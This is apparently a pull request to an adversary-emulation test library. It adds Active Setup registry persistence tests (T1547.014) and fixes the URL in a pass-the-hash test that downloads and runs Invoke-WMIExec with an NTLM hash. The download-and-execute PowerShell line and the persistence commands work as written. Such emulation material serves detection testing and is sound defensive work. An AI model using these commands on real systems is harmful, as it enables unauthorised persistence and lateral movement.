### PR TITLE
Add t1547.014

### DIFF
--- a/atomics/T1547.014/T1547.014.yaml
+++ b/atomics/T1547.014/T1547.014.yaml
@@ -1,0 +1,55 @@
+---
+attack_technique: T1547.014
+display_name: 'Boot or Logon Autostart Execution: Active Setup'
+atomic_tests:
+- name: Add Active Setup key via Powershell
+  auto_generated_guid:
+  description: |
+    Uses Powershell's **New-ItemProperty** cmdlet to add **StubPath** key to to **HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components** in Windows registry.
+    Active Setup is a Windows mechanism that is used to execute programs when a user logs in.
+    This technique has been used by [PoisonIvy](https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/)
+  supported_platforms:
+    - windows
+  input_arguments:
+    command:
+      description: Command to execute
+      type: String
+      default: c:\windows\system32\cmd.exe
+    guid:
+      description: CLSID to use in registry key path
+      type: String
+      default: 4edc6cdd-0760-4bd6-a6ed-a7c2ad6cfbe7
+  executor:
+    name: powershell
+    elevation_required: true 
+    command: |
+      $registryPath="HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{#{guid}}"
+      New-Item -Path $registryPath -Force -ErrorAction Ignore
+      New-ItemProperty -Path $registryPath -Name "StubPath" -Value "#{command}" -ErrorAction Ignore
+    cleanup_command: | 
+      Remove-Item -Force "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{#{guid}}" -ErrorAction Ignore
+
+- name: Add Active Setup key via reg.exe
+  auto_generated_guid:
+  description: |
+    Uses **reg.exe** command to add **StubPath** key to to **HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components** in Windows registry.
+    Active Setup is a Windows mechanism that is used to execute programs when a user logs in.
+    This technique has been used by [PoisonIvy](https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/)
+  supported_platforms:
+    - windows
+  input_arguments:
+    command:
+      description: Command to execute
+      type: String
+      default: c:\windows\system32\cmd.exe
+    guid:
+      description: CLSID to use in registry key path
+      type: String
+      default: 4edc6cdd-1760-4bd6-a6ed-a7c2ad6cfbe7
+  executor:
+    name: command_prompt
+    elevation_required: true 
+    command: |
+      reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{#{guid}}" /v StubPath /t REG_SZ /d "#{command}" 2> nul
+    cleanup_command: | 
+      reg delete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{#{guid}}" /f 2> nul

--- a/atomics/T1550.002/T1550.002.yaml
+++ b/atomics/T1550.002/T1550.002.yaml
@@ -110,5 +110,5 @@ atomic_tests:
   executor:
     command: |-
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+      IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
     name: powershell


### PR DESCRIPTION
**Details:**
Addition of test for T1547.014 - **Boot or Logon Autostart Execution: Active Setup**
The test uses 2 methods to create a new registry key in *Active Setup*, Powershell and reg.exe

**Testing:**
This was tested on Windows 10 VM
![image](https://user-images.githubusercontent.com/1841716/179265893-4fd82ed0-2637-4d12-b1db-55e851353acd.png)
![image](https://user-images.githubusercontent.com/1841716/179266042-c9cb28f6-16e5-4f12-9498-ee729e28733b.png)

**Associated Issues:**
N/A